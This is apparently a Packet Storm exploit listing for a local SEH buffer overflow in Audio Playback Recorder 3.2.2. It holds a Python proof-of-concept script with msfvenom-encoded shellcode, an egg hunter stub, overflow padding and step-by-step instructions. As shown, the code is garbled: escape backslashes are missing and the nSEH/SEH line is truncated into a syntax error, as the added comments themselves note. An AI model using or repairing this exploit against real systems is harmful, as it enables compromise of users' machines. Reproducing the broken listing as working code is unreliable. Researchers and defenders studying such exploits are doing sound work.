
Audio Playback Recorder 3.2.2 Local Buffer Overflow ≈ Packet Storm



# Exploit Title: Audio Playback Recorder 3.2.2 - Local Buffer Overflow (SEH)
# Date: 2020-09-08
# Author: Felipe Winsnes
# Software Link: https://archive.org/download/tucows_288670_Audio_Playback_Recorder/AudioRec.exe
# Version: 3.2.2
# Tested on: Windows 7 (x86)

# Blog: https://whitecr0wz.github.io/
# Proof of the vulnerability: https://whitecr0wz.github.io/assets/img/Findings11/11-proof.gif

# Proof of Concept:
# 1.- Run the python script, it will create the files "poc.txt" & "buf.txt".
# 2.- Copy the content of the new file "buf.txt" to clipboard.
# 3.- Open the application.
# 4.- Click on the bottom-right blue button to eject.
# 5.- Delete everything on the parameter and paste the clipboard (buf.txt).
# 6.- Click eject once again to close it.
# 7.- Copy poc.txt to the clipboard.
# 8.- Click on "Register".
# 9.- Paste clipboard (poc.txt) on the parameter "Name".
# 10.- Profit.

import struct

# msfvenom -p windows/exec CMD=calc.exe -f py -e x86/alpha_mixed EXITFUNC=thread
# Payload size: 447 bytes

# Stage-2 payload, prefixed with the "w00tw00t" tag that the egg hunter stub
# (`egg`, below) scans memory for. As published, every escape sequence has
# lost its backslash, so these literals are plain ASCII text and NOT the
# 447-byte payload the msfvenom comment above describes; the listing is
# not functional as-is.
# Defender note: the vulnerable input is the registration "Name" field
# (see the PoC steps above). Length validation on that field and the
# platform SEH protections (SafeSEH/SEHOP/DEP) are the relevant mitigations;
# the "w00tw00t" tag and the x86/alpha_mixed-encoded blob are distinctive
# artifacts to look for in clipboard/registration input.
buf = b"w00tw00t"
buf += b"x89xe2xdaxd4xd9x72xf4x59x49x49x49x49x49"
buf += b"x49x49x49x49x49x49x43x43x43x43x43x43x37"
buf += b"x51x5ax6ax41x58x50x30x41x30x41x6bx41x41"
buf += b"x51x32x41x42x32x42x42x30x42x42x41x42x58"
buf += b"x50x38x41x42x75x4ax49x69x6cx4bx58x6dx52"
buf += b"x63x30x47x70x63x30x61x70x6bx39x4ax45x65"
buf += b"x61x4fx30x33x54x6ex6bx30x50x66x50x6cx4b"
buf += b"x62x72x54x4cx4cx4bx33x62x32x34x4cx4bx42"
buf += b"x52x64x68x64x4fx4dx67x42x6ax37x56x36x51"
buf += b"x39x6fx4ex4cx67x4cx50x61x31x6cx45x52x36"
buf += b"x4cx45x70x7ax61x78x4fx46x6dx37x71x4ax67"
buf += b"x79x72x78x72x36x32x43x67x6ex6bx56x32x34"
buf += b"x50x6ex6bx51x5ax77x4cx6ex6bx52x6cx74x51"
buf += b"x34x38x49x73x53x78x67x71x48x51x30x51x6e"
buf += b"x6bx62x79x37x50x56x61x6ax73x6cx4bx63x79"
buf += b"x45x48x79x73x47x4ax42x69x6cx4bx44x74x6c"
buf += b"x4bx56x61x68x56x76x51x59x6fx4cx6cx79x51"
buf += b"x58x4fx54x4dx77x71x39x57x76x58x4bx50x53"
buf += b"x45x38x76x47x73x71x6dx5ax58x37x4bx31x6d"
buf += b"x46x44x71x65x4ax44x33x68x4ex6bx36x38x57"
buf += b"x54x36x61x6ax73x43x56x6cx4bx54x4cx50x4b"
buf += b"x6cx4bx36x38x57x6cx75x51x6bx63x4cx4bx45"
buf += b"x54x4cx4bx65x51x6ax70x6fx79x73x74x57x54"
buf += b"x76x44x33x6bx63x6bx43x51x72x79x72x7ax63"
buf += b"x61x6bx4fx49x70x61x4fx63x6fx61x4ax4cx4b"
buf += b"x62x32x4ax4bx4ex6dx73x6dx61x7ax57x71x6c"
buf += b"x4dx4fx75x4cx72x47x70x65x50x35x50x56x30"
buf += b"x63x58x50x31x6ex6bx32x4fx4cx47x49x6fx79"
buf += b"x45x6dx6bx6dx30x47x6dx76x4ax65x5ax33x58"
buf += b"x49x36x7ax35x6dx6dx4dx4dx49x6fx4ex35x37"
buf += b"x4cx37x76x51x6cx35x5ax6fx70x6bx4bx4bx50"
buf += b"x63x45x54x45x6fx4bx53x77x54x53x71x62x70"
buf += b"x6fx50x6ax35x50x46x33x79x6fx68x55x31x73"
buf += b"x53x51x70x6cx43x53x56x4ex62x45x73x48x71"
buf += b"x75x67x70x41x41"

# Egg hunter stub placed in the overflowed "Name" field. The bytes
# 77 30 30 74 ("w00t") inside it are the tag it compares against; the
# same escape-stripping as above applies, so this is ASCII text as listed.
# Note this is a str while `buf` is bytes: the script is written for Python 2.
egg = ""
egg += "x66x81xcaxffx0fx42x52x6ax02x58xcdx2ex3cx05x5ax74"
egg += "xefxb8x77x30x30x74x8bxfaxafx75xeaxafx75xe7xffxe7"





# Garbled in this listing: the nSEH and SEH `struct.pack(...)` values were
# truncated during extraction and cannot be recovered from the page. As
# written this line is an unterminated string literal (SyntaxError), so the
# script does not run in this form. Left byte-identical on purpose.
nseh = struct.pack("seh = struct.pack("

# Layout of the SEH-overflow input: 456 bytes of padding to reach nSEH,
# the nSEH/SEH pair, 5 bytes, the egg hunter, then 200 bytes of 0xff filler
# (as published, "xff" is three ASCII characters, not one byte).
# Under Python 3 this line would raise TypeError (str + bytes) once
# `nseh`/`seh` are bytes; again, Python 2 semantics are assumed.
buffer = "A" * 456 + nseh + seh + "A" * 5 + egg + "xff" * 200

# Write the two stages to disk. Both files are opened in text mode; under
# Python 3 writing `buf` (bytes) to a text-mode file raises TypeError.
f = open ("poc.txt", "w")
f.write(buffer)
f.close()

f = open ("buf.txt", "w")
f.write(buf)
f.close()
